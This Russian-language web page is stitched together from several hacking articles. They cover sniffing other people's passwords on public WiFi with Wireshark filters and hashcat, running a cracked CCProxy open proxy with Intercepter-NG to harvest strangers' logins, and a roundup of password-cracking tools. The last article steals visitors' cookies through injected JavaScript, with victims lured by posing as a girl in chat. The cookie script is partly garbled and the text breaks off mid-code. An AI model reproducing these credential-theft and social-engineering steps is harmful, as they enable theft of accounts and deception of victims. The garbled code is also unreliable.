Собираем пароли юзеров с помощью прокси и сниффера. Игорь найдьонов Инструкция по использованию mitmAP

Материал создан не для взлома и захвата личных данных. А с целью дать понять схему и принцип защиты простому пользователю его данных. Если знать схему из нутри то и понять как защитить себя в кафе или других общественных местах, подключившись к любой доступной сети. Скажем как пример WiFi в кафе, возможно все ниже описываемое стоит как уже входящее в штат программ этого кафе. Все это реально, если не убедит статья, попробуйте сделать сами. Если не чего не поймете можете обратиться с просьбой помочь в самом низу статьи в комментарий.

  • Возьмем один из много численных примеров: Google просит всех Администраторов сайтов, переходить с HTTP на HTTPS тем самым создавая зашифрованные соединения, между клиентом и сервером(Между вами и сайтом). Переходить на HTTPS хостеры(Администраторы сайтов) не торопятся, многие клиенты используют все еще операционную систему Windows XP, которая не поддерживает этот протокол HTTPS а работает на старом HTTP. Тем самым клиенту использующему Windows XP будет попросту не зайти на такой сайт с зашифрованном соединении HTTPS. Одна из причин почему хостеры не используют протокол HTTPS. Ниже идет более подробное описание:
  • Очень часто они(ваши данные) передаются по сети не в защищенном виде. Поэтому если сайт, на котором вы пытаетесь авторизоваться, использует HTTP протокол, то очень просто выполнить захват этого трафика, проанализировать его с помощью Wireshark и далее с помощью специальных фильтров и программ найти и расшифровать пароль. Но не отчаивайтесь, чтобы ваши пароли перехватить надо подключится к вашей сети. WiFi например надо с начало узнать пароль а уже потом и другие пароли на ваши ресурсы. Почему в данное время много говорят о том что не стоит подключаться к WiFi в кафе или в других не знакомых местах. Потому что ваш трафик пойдет по этой сети, а дальше, что дальше, читайте дальше.
  • Лучшее место для перехвата паролей – ядро сети, где ходит трафик всех пользователей к закрытым ресурсам (например, почта) или перед маршрутизатором для выхода в Интернет, при регистрациях на внешних ресурсах. Настраиваем зеркало и мы готовы почувствовать себя хакером.
  • Теперь все по порядку:Шаг 1. Устанавливаем и запускаем Wireshark для захвата трафика
  • Иногда для этого достаточно выбрать только интерфейс, через который мы планируем захват трафика, и нажать кнопку Start. В нашем случае делаем захват по беспроводной сети.
  • Захват трафика начался.
  • Шаг 2. Фильтрация захваченного POST трафика
  • Открываем браузер и пытаемся авторизоваться на каком-либо ресурсе с помощью логина и пароля. По завершению процесса авторизации и открытия сайта мы останавливаем захват трафика в Wireshark. Далее открываем анализатор протоколов и видим большое количество пакетов. Именно на этом этапе большинство ИТ-специалистов сдаются, так как не знают, что делать дальше. Но мы знаем и нас интересуют конкретные пакеты, которые содержат POST данные, которые формируются на нашей локальной машине при заполнении формы на экране и отправляются на удаленные сервер при нажатии кнопки «Вход» или «Авторизация» в браузере.
  • Вводим в окне специальный фильтр для отображения захваченных пакетов: http.request.method == “POST”
  • И видим вместо тысячи пакетов, всего один с искомыми нами данными.
  • Шаг 3. Находим логин и пароль пользователя
  • Быстрый клик правой кнопки мыши и выбираем из меню пункт Follow TCP Steam
  • После этого в новом окне появится текст, который в коде восстанавливает содержимое страницы. Найдем поля «password» и «user», которые соответствуют паролю и имени пользователя. В некоторых случаях оба поля будут легко читаем и даже не зашифрованы, но если мы пытаемся захватить трафик при обращении к очень известным ресурсам типа: Mail.ru, Facebook, Вконтакте и т.д., то пароль будет закодирован:
  • HTTP/1.1 302 Found
  • Date: Mon, 10 Nov 2014 23:52:21 GMT
  • Server: Apache/2.2.15 (CentOS)
  • X-Powered-By: PHP/5.3.3
  • P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
  • Set-Cookie: non=non; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/
  • Set-Cookie: password=e4b7c855be6e3d4307b8d6ba4cd4ab91; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/
  • Set-Cookie: scifuser=networkguru; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/
  • Location: loggedin.php
  • Content-Length: 0
  • Connection: close
  • Content-Type: text/html; charset=UTF-8
  • Таким образом, в нашем случае:
  • Имя пользователя: networkguru
  • Пароль:
  • Шаг 4. Определение типа кодирования для расшифровки пароля
  • Заходим, например, на сайт и вводим наш пароль в окно для идентификации. Выбираете протокол кодирования:
  • Шаг 5. Расшифровка пароля пользователя
  • На данном этапе можем воспользоваться утилитой hashcat:
  • ~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
  • На выходе мы получили расшифрованным пароль: simplepassword
  • Таким образом, с помощью Wireshark мы можем не только решать проблемы в работе приложений и сервисов, но и также попробовать себя в роли хакера, осуществляя перехват паролей, которые пользователи вводят в веб-формах. Также можно узнавать и пароли к почтовым ящикам пользователей, используя незатейливые фильтры для отображения:
  • Протокол POP и фильтр выглядит следующим образом: pop.request.command == "USER" || pop.request.command == "PASS"
  • Протокол IMAP и фильтр будет: imap.request contains "login"
  • Протокол SMTP и потребуется ввод следующего фильтра: smtp.req.command == "AUTH"

  • Привет! Пару дней назад нашел программу Intercepter-NG . Как все уже знают - это сниффер трафика для Windows. Раньше я собирал логи с помощью подобной проги и дедика, но пару дней назад решил попробовать не заморачиваться с установкой Windows Server на дед и натравить мой сниффер на прокси. Идея казалась удачной, и даже пробовал писать одному форумчанину в скайп, но платить 100р за способ мне не очень-то хотелось, и я решил сам разобраться в этой схеме..

    Вообщем, что же нам понадобится? Я буду использовать CCProxy и Intercepter-NG .
    Теперь по настройкам:
    CCProxy
    1. Устанавливаем и крякаем (кейген).
    2. Открываем прогу и заходим в Account (см. Скрин):
    2.1 Кто допущен? - Все

    3. Жмем Да, закрываем Accouts и открываем Options
    4. В Options выставляем все как у меня на скрине:

    5. Закрываем Options кнопкой Да и запускаем сервак - жмем Start.

    Теперь насчет Intercepter-NG :
    Тут все просто - качаем прогу и запускаем. Далее в поле (см. скрин) выставляем ваш адаптер, через который вы коннектитесь к интернету.

    Вот и все. Просто и понятно, не правда ли?
    Оффтоп:
    Сначала инфа не очень шустро идет, но спустя минут 30-45 разгоняется очень сильно!

    Недавно мы опубликовали статью о надежности паролей, а также паролях, которые используются многими пользователями. Большинство людей используют слабые пароли. Но как убедится, что ваш пароль сильный? Взлом паролей - это неотъемлемая часть цифровой криминалистики и тестирования информационной безопасности.

    В этой статье мы собрали лучшие программы для взлома паролей, которые могут использоваться системными администраторами для проверки надежности их паролей. Все утилиты используют различные алгоритмы и применимы к различным ситуациям. Рассмотрим сначала базовую информацию, которая поможет вам понять с чем мы будем иметь дело.

    В области кибербезопасности и криптографии взлом паролей играет очень важную роль. Это процесс восстановления пароля с целью нарушения или восстановления безопасности компьютера или системы. Итак, почему вам нужно узнать программы перебора паролей? В мирных целях можно использовать взлом паролей для восстановления забытых паролей от онлайн аккаунтов, также это используется системными администраторами для профилактики на регулярной основе.

    Для взлома паролей в большинстве случаев используется перебор. Программное обеспечение генерирует различные варианты паролей и сообщает если был найден правильный. В некоторых случаях персональный компьютер способен выдавать миллионы вариантов в секунду. Программа для взлома пароля на пк проверяет все варианты и находит реальный пароль.

    Время, необходимое для взлома пароля пропорционально длине и сложности этого пароля. Поэтому рекомендуется использовать сложные пароли, которые трудно угадать или подобрать. Также скорость перебора зависит от криптографической функции, которая применяется для генерации хэшей пароля. Поэтому для шифрования пароля лучше использовать Bcrypt, а не MD5 или SHA.

    Вот основные способы перебора пароля, которые используются злоумышленниками:

    • Атака по словарю - для атаки используется файл, который содержит список слов. Программа проверяет каждое из слов, чтобы найти результат;
    • Атака Bruteforce - можно не использовать словарь, а перебирать все комбинации заданных символов;
    • Атака с помощью радужных таблиц - в атаке используются предварительно вычисленные хэши, поэтому она быстрее.

    Есть и другие методы взлома паролей, основанные на социальной инженерии, но сегодня мы остановимся только на атаках без участия пользователя. Чтобы защититься от таких атак нужно использовать только сложные пароли. А теперь рассмотрим лучшие инструменты для взлома паролей 2017. Этот список опубликован только для ознакомительных целей и мы ни в коем случае не призываем взламывать чужие личные данные.

    Лучшие программы для перебора паролей 1. John the Ripper

    John the Ripper - это один из самых популярный инструментов для перебора паролей, доступных абсолютно всем. Он распространяется с открытым исходным кодом и написан на языке программирования Си. Здесь собраны различные методы перебора паролей.

    Программа способна перебирать пароли по сохраненному хэшу, и поддерживает различные алгоритмы хэширования, в том числе есть автоматическое определение алгоритма. John the Ripper относиться к набору инструментов для тестирования безопасности от Rapid7. Кроме Linux поддерживается Windows и MacOS.

    2. Aircrack-ng

    Aircrack-ng - это набор программ для взлома и перехвата паролей от wifi сетей. Программа - одна из лучших, которые используются хакерами. Здесь есть все необходимое для взлома WEP и WPA шифрования, начиная от перехвата хэша, и до получения готового пароля.

    Особенно легко поддается взлому шифрование WEP, для преодоления защиты существуют атаки PMS и PTW, с помощью которых можно взломать этот протокол в считаные минуты при достаточном потоке трафика через сеть. Поэтому всегда используйте WPA2 чтобы быть в безопасности. Тоже поддерживаются все три платформы: Linux, Windows, MacOS.

    3. RainbowCrack

    Как следует из названия, RainbowCrack использует радужные таблицы для взлома хэшей паролей. С помощью уже готовых таблиц утилита очень сильно уменьшает время взлома. Кроме того, есть как графический интерфейс, так и утилиты командной строки.

    После завершения этапа предварительных вычислений этот инструмент работает в сотни раз быстрее чем при обычном переборе. Вам не нужно самим создавать таблицы, разработчики уже создали их для LM, NTLM, MD5 и SHA1. Все доступно бесплатно.

    Еще один важный момент - это ускорение с помощью GPU. С помощью использования видеокарты вы можете снизить время вычисление пароля еще на несколько порядков. Поддерживаются платформы Windows и Linux.

    4. THC Hydra

    В отличие от выше перечисленных программ, Hydra работает по-другому. Она не вычисляет хэши. Вместо этого, программа выполняет атаки перебора на различные сетевые протоколы. Здесь поддерживаются Astrisk, FTP, HTTP, MySQL, XMPP, Telnet, SHH и многие другие. Основная цель утилиты - атаки перебора на форму ввода пароля.

    Этот инструмент помогает исследователям безопасности узнать насколько легко можно получить доступ к удаленной системе. Для расширения функций можно добавлять модули, поддерживается Linux, Windows, Solaris, FreeBSD и MacOS.

    5. HashCat

    По заявлениям разработчиков - это самый быстрый инструмент для перебора паролей. Он распространяется в качестве свободного программного обеспечения и поддерживает такие алгоритмы: md4, md5, LM, SHA, MySQL, Cisco PIX и Unix Crypt.

    Есть версии инструмента для перебора на CPU, а также взлома на основе GPU - oclHashcat и cudaHashcat. Кроме стандартной атаки Bruteforce, поддерживаются атаки по словарю, гибридные атаки по самые, по таблицам, Prince и так далее. Из платформ поддерживаются Windows, Linux и MacOS.

    6. Crowbar

    Crowbar - это популярный инструмент для тестирования безопасности паролей. Другие программы перебора паролей используют логины и пароли пользователей, но crowbar позволяет перебирать ключи SSH.

    Этот инструмент с открытым исходным кодом создан для работы с протоколами, которые редко поддерживаются другими программами. Сейчас поддерживается VNC, OpenVPN, SSP, NLA. Программа может работать на Linux, Windows и MacOS.

    7. coWPAtty

    Это реализация утилиты для перебора пароля от WPA/WPA2 PSK на основе словаря или радужных таблиц. Использование радужных таблиц очень сильно ускоряет работу утилиты. Стандарт PSK используется сейчас очень часто. Радует только то, что перебрать пароль очень сложно, если он был изначально выбран правильным.

    Хакерские Cкрипты PHP. JS. PERL.
    Скрипты для кражи паролей
    br>Итак, в этой статье я расскажу, как можно получить пароль и всякую интересную информацию при помощи сайта. Всё что нужно "хацкеру" - это просто иметь в сети свою страничку, на которую вы либо придёте сами, либо вас туда заманят. Скитаясь по сети, я всё чаще и чаще слышу плохие отзывы о социнжинерии. Если вас не интересуют способы взлома с применением социнжинерии или для вас это всё детский лепет, то нажмите в верхнем углу вашего браузера крестик и забудьте о существовании этой статьи. В наше время мало только разбираться в системных кодах и всяких программерских штучках, но ещё надо уметь общаться с народом. Многие хакеры взламывают банки, компьютеры, базы данных не только вычисляя уязвимости в системе безопасности, но и пользуются социнженерией на каждом углу, ведь хакер не только тот, кто взломал систему, но и тот, кто методом общения получает зачастую доступ к самым любопытным местам инета. Достаточно вспомнить так называемого мега хакера Митника, который взломал систему безопасности банка при помощи как раз той самой соцэнжинерии. Сначала я объясню способ взлома простых пользователей, а затем более глобальный взлом, например какой-нить фирмы. Представьте себе, что "хацкер" платит за сеть немалую сумму и начинает подумывать, как бы сделать её бесплатной, или его не пускают без пароля на какой-то рессурс в сети, а у вас есть то, что ему нужно. Первоначально он создаёт себе страничку в сети и на одной из страничек вживляет код примерно вот такой!

    var cook=show_all_cookies();

    document.open("cookies",cook);

    document.write("

    document.close("cookies");

    (скрипт в целях безопасности был немного изменён) Теперь остаётся только заманить на сайт жертву, где вылетит окошко с надписью "Доброго времени суток" после нажатия на кнопку ОК на мыло злоумышленника будут высланы ваши Cookies, в которых содержится много чего интересного - от вашего IP адреса до паролей к службам, которыми вы пользуетесь.

    При простом изучении Cookies можно отрыть довольно много интересной информации. Всё, чем злоумышленник рискует - это то, что он светит своё мыло, но так как сейчас слишком много халявных почтовых ящиков, это не так опасно. Обычно ящик создаётся для проведения атаки, а затем либо сносится или забрасывается и взломщика уже не найти. Хотя можно этот скрипт написать в файле с расширением js и вставить на сайте его при помощи

    Выкладываем свои!

    в этом случает мыло уже не светится. Как же заманить жертву на свой сайт? Да способов до безумия много, например, вы вваливаетесь на чат и выбираете жертву, немного поговорив с жертвой, вы должны добиться её расположения, лучше всего если ваша жертва будет противоположного вам пола. Практика показывает, что лучше всего чтобы вы были представлены в чате девушкой, соответственно выбираете себе ник, который бы вас характиризовал, как девушку (при разговоре смотрите, что пишите. Не выдайте себя окончаниями слов, если вы притворились девушкой, так будьте ей). Каждому понятно, что с девушкой будут говорить все. Помните, что лучше на жертву не давить, а, например, спросить "а у тебя есть фотка? Моя лежит вот по этому адресу http://ваш сайт.ru, сходи если хочешь". Каждому парню будет интересно знать, как выглядит его собеседница, а как только он попадёт на вашу страничку, вы лезьте в потовый ящик и забирайте оттуда его Cookies. Вот и всё, теперь просто надо в них порыться и вы найдёте практически всё, что хотите, таким же способом можно узнавать IP адрес человека, который пользуется прокси серверами, а зная IP, уже можно будет проверить его на расшаренные ресурсы, провести Dos атаку или просто по детски выкинуть из чата. А также можно просто прикалываться при помощи сайта, например, при помощи вот этого скрипта:

    for(I=1 ; I